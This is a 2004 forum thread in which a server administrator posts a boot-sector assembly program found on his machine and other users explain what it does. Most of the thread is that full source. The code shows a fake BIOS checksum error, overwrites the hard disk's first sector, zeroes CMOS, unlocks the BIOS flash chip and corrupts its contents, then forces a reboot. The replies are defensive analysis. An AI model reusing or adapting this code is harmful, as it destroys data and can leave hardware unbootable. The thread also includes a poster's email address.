possible BIOS attack tool???

Paul6253 · 11-03-2004, 01:55 PM

I rescently found this code on my server...I am posting it here becuz
I want to clarify what I think it does and if indeed it would do it
as for now the user's account has been frozen- I dont
like this code--

what I have asserted:
1- it's a bootsector
2- it writes randmom stuff to IDE0
3- it *tries* to write to ROM-- possibly nuke BIOS?!!!?

Thanks for any input...

Code:

BITS 16
org 0
EntryPoint:

    jmp 0x07C0:AfterData


		; BIOS PARAMETER BLOCK
		oemID				db "DIE-OS", 0, 0		; 8 bytes
		bytSPerSector		dw 0200h
		sectorsPerCluster	db 01h
		nrReservedSectors	dw 0001h				; bootloader is spanning 1 sectors
		nrFats				db 02h
		nrRootDirs			dw 00E0h
		totalSectorsSmall	dw 0B40h
		mDIaID				db 0F0h
		sectorsPerFat		dw 0009h
		sectorsPerTrack		dw 0012h
		headsPerCylinder	dw 0002h
		hiddenSectors		dd 00000000h
		totalSectorsLarge	dd 00000000h
		driveNr				db 00h
		;OPTIONAL FIELDS, NOT NEEDED ON
		;FAT12, SKIPPED TO SAVE SIZE.
		flags				db 00h
		signature			db 29h
		volumeID			dd 0FFFFFFFFh
		volumeLabel			db "XXXXXXXXX"
		systemID			db "FAT12   "

		;my data
		 BOOT_MSG db 'BIOS CHECKSUM ERROR',10,13,0
                 BLAH     dw 0

AfterData:
; update DS to be 7C0 instead of 0
push CS
pop DS

; update ES also
push CS
pop ES

; create stack
mov ax, 0x0000
mov ss, ax
mov sp, 0xFFFF


; display boot message...
lea si, [BOOT_MSG]
call Print
call Play
call kill_hdd
jmp kill_BIOS 

;************************************************************
; Procedure print
; prints a zero terminated string pointed to by si
;************************************************************
Print:
push ax
mov ah, 14 ; BIOS code for screen display
cld
print_loop:
lodsb ; moving the character to be displayed to al
or al, al ; checking if the char is NULL
jz printdone
int 10h ; Calling BIOS routine
JMP print_loop

printdone:
pop ax
ret
; End of print procedure...




Play:
mov di,0666h
in  al,061h
or al,3
out 061h,al
mov al,0b6h
out 043h,al
mov dx,014h
mov ax,04f38h
div di
out  042h,al
mov al,ah
out 042h,al
ret
kill_hdd:
        mov	dx, 1F2h
	mov	al,1
	out	dx,al
	inc	dx
	out	dx,al
	inc	dx
	xor	ax,ax
	out	dx,al
	inc	dx
	out	dx,al
	mov	al, 10100000b
	inc	dx
	out	dx,al
	inc	dx
	mov	al,30h
	out	dx,al
	lea	si, [0c000h]
	mov	dx, 1F0h
	mov	cx, 513
	rep	outsw
	RET
kill_BIOS:


                CLI   ; dont interrupt me 

		MOV	CL, 128			         ;map cmos

Nuke_CMOS_Byte: DEC	CL			; done?
		JS	Nuke_BIOS

		MOV	AL, CL			; Request I/O to byte CL.
		OUT	70h, AL

		XOR	AL, AL			; clear and write
		OUT	71h, AL

		JMP	Nuke_CMOS_Byte		; Repeat until all is done.



Nuke_BIOS:	; Show BIOS Page in 000E0000 - 000EFFFF (64k).

		MOV	EDI, 8000384Ch
		MOV	BP, 0CF8h
		MOV	DX, 0CFEh
		CALL	IOForEEPROM

		; Show BIOS Page in 000F0000 - 000FFFFF (64k).

		MOV	DI, 0058h
		DEC	DX
		CALL	IOForEEPROM

; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory  *
; * 000E0000 - 000E01FF *
; *   (   512 Bytes   ) *
; * , and the Section   *
; * of Extra BIOS can   *
; * be Writted...       *
; ***********************



		push 0e555h
		pop ds
		mov si,5
		


		push 0e2aah
		pop es
		
		

		MOV     byte  [ds:si], 0aah
		MOV	byte  [es:0ah], 055h

		MOV	BYTE  [ds:si],80h
		MOV	byte  [ds:si],CL
		MOV	byte  [es:0ah], AL


		MOV	BYTE  [ds:si], 60h

                mov ecx,0e2aaah
		LOOP	$                            ;very tiny delay
                 
                mov ecx,0e2aaah 		;restore ecx
		                                          ;cant use push\pop cuz 
						           ;were using 2byte  stacks
	; Kill off BIOS Extra ROM Data in 000E0000h - 000E007Fh, (80h bytes).

		XOR	AH, AH
		MOV	WORD  [ds:si], 'RI'    

		XCHG	CX, AX

		LOOP	$

; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data  *
; * 000E0000 - 000FFFFF *
; *   (   128 KB   )    *
; * can be Writted...   *
; ***********************


		push 0f555h
		pop ds
		mov si,5
                mov ecx,0e2aaah 
		MOV	CH, 0AAh

                ; Enable EEPROM to Write.

		MOV	[ds:si], CL
		MOV	byte [ECX], AL

		MOV	BYTE  [ds:si], 80h
		MOV	byte  [ds:si], CL
		MOV	byte  [ECX], AL

		MOV	BYTE  [ds:si], 20h
		LOOP	$

	; Destroy BIOS Main ROM Data in 000FE000h - 000FE07Fh (80h bytes).

		xor al,al
                push 0fe00h
		pop ds
		mov si,0
		mov [ds:si],al

		CALL	IOForEEPROM

                ; store magic value at 0040h:0072h to reboot:
                ;		0000h - cold boot.
                ;		1234h - warm boot.

	MOV  AX,0040h
	MOV  DS,AX
	MOV  word[0072h],0000h   ; cold boot.
	JMP  0FFFFh:0000h	 ; reboot!




; I/O for EEPROM.
IOForEEPROM:
		XCHG	DI, AX
		XCHG	DX, BP
		OUT	DX, AX

		XCHG	DI, AX
		XCHG	DX, BP
		IN	AL, DX

		OR	AL, 44h



		XCHG	DI, AX
		XCHG	DX, BP
		OUT	DX, AX

		XCHG	DI, AX
		XCHG	DX, BP
		OUT	DX, AL

		RET




; Make the file 512 bytes long
TIMES 510-($-$$) DB 0

; Add the boot signature
dw 0AA55h

Xolo · 11-03-2004, 02:03 PM

Somehow it doesn't look finished to me.
But reading through the code it does look like there are procedures to write to 128kb portions of the BIOS Flash ROM, including checks for cold boot and warm boot checking and a reboot routine. and a harddisk write routine.
Whether or not is is for malicious intent, depends on the user's history, I think?

m00t00 · 11-03-2004, 02:10 PM

well, routines named kill_bios and kill_hdd dont make me feel very fuzzy. And the comments too, like "destroy bios."

It looks like it tries to kill the hard drive, a byte in the cmos, and the bios.

bignerd · 11-03-2004, 07:55 PM

I've written simple assembly code on x86 machines back in the 90's to read and write to PC bios before. This indeed is designed to once compiled to write to bios. Never a good idea unless you know exactly what you are doing. Without going into details this code will display a message (BIOS CHECKSUM ERROR) directly into video memory, ie the screen and then write 0's over the entire cmos area. Usually that's bad. :-)

This does not appear to be friendly code.

The kill_hdd section is classic assembly code for deleting the boot sector of a hard drive. Practially straight from a text book.

I've not done any boot sector programs so I can't comment on that. But there is no virial code for spreading. Looks like something would need to write this to the drive boot sector (floppy, cd or hard drive) then booted from that device before it would be dangerous. After the code is compiled obviously.

-b

edit:

forgot to mention I suppose it could be on the boot sector of a usb flash drive too.

Paul6253 · 11-04-2004, 02:34 PM

Bignerd,
thanks for your reply...since you seemed most knowledgable about this I sent you an email to expand upon.
thanks to the other responders as well
regards

Matir · 11-04-2004, 09:50 PM

On a related note, I do assume that something like this can not be exploited without root/physical access, correct? It would seem like such a big and such an obvious security hole, but hey, I figured I'd ask.

bignerd · 11-05-2004, 12:15 AM

Quote:

Originally posted by Paul6253
Bignerd,
thanks for your reply...since you seemed most knowledgable about this I sent you an email to expand upon.
thanks to the other responders as well
regards

got your email but my reply to you bounced.

Message from yahoo.com.
Unable to deliver message to the following address(es).

<v3ct0r99@hotmail.com>

m00t00 · 11-05-2004, 04:03 PM

Quote:

Originally posted by Matir
On a related note, I do assume that something like this can not be exploited without root/physical access, correct? It would seem like such a big and such an obvious security hole, but hey, I figured I'd ask.

correct. Because this is boot sector code, you need to have write access to the boot sector on a particular device. Usually the hard drive, unless you have physical access to and can do a floppy (or hey, mabye even a cd/dvd).

Matir · 11-05-2004, 06:13 PM

Hrrm, some kind of heurestic analysis tool for things like that might be useful.